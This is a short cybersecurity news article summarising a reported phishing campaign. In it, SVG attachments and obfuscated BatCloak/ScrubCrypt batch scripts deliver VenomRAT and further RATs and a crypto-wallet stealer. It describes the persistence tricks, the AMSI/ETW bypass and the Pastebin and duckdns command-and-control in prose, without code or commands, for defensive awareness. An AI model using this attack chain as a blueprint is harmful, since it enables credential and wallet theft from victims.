Attackers use phishing emails with SVG attachments to trick users into downloading a ZIP file containing a malicious batch script using BatCloak obfuscation and ScrubCrypt to deploy VenomRAT on compromised Microsoft Windows machines.
VenomRAT then connects to a command and control server to download additional malware, including Remcos, XWorm, NanoCore, and a cryptocurrency wallet stealer. This highlights the evolving techniques attackers use to bypass traditional security solutions.
A phishing email with a malicious SVG attachment initiates the attack by exploiting a browser vulnerability to drop a ZIP file containing an obfuscated batch script.
The script, likely generated by BatCloak, uses PowerShell to download a malicious payload disguised as an image file, execute it in a hidden manner and then delete all traces of its activity.
ScrubCrypt, a malicious batch script disguised as “pointer.cmd,” uses Base64-encoded payloads and AES-CBC decryption to deploy two functionalities.
According to Fortinet, the first payload establishes persistence by checking for admin rights: if granted, it schedules a task to run itself at login under the privileged “OneNote 83701” name.
Otherwise, it copies itself to the Startup folder and loads and executes an assembly containing VenomRAT, while the second payload bypasses security measures like AMSI and ETW.
Venom RAT Plugins:
VenomRAT, a RAT derived from QuasarRAT, utilizes Base64-encoded and AES-CBC encrypted configurations to establish connections with its C2 server. After initial communication to transmit victim information, VenomRAT maintains persistent communication channels to receive additional plugins.
The plugins, delivered as “save_Plugin” directives, are typically DLLs like “SendFile.dll” that can parse further malicious instructions upon receiving “plug_in” files from the C2 server.
The functionality of these plugins seems to vary based on the extracted filenames, potentially enabling the execution of PowerShell commands for various malicious purposes.
ScrubCrypt deploys Venom RAT v6.0.3, which has keylogging functionality with a heavily obfuscated script within ScrubCrypt and bypasses AMSI and ETW security measures.
Venom RAT then steals various data and transmits it to a C2 server hosted on Pastebin.
The NanoCore RAT uses a compromised device’s obfuscated VBS script to download a steganographic image that conceals encoded.NET malware within its data, which establishes persistence, checks for virtual environments, fetches additional data, and executes NanoCore using RegAsm.
VenomRAT injects XWorm, a RAT, through a VBS script disguised as a plugin by triggering a PowerShell download that obfuscates the next stage using junk comments and process hollowing to inject XWorm’s final shellcode.
Remcos, a malicious RAT disguised as remote management software, grants attackers full control of compromised systems after being delivered through phishing campaigns whose configuration, encrypted within the “SETTINGS” resource, can be decrypted to reveal details of its operation.
The stealer plugin, delivered through obfuscated VBS and.NET, injects a payload that steals crypto wallet data, Foxmail, and Telegram info by searching for relevant apps by path and registry key and transmits stolen data with an execution path to the C2 server.
The Indicators of Compromise (IOCs) consist of malicious URLs and domain names likely used for C2 communication pointing to image files and potentially obfuscated malicious content.
The domain names consist of several subdomains under duckdns.org, potentially used for hosting malware or phishing sites and a list of file hashes, possibly malware samples, was also identified.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.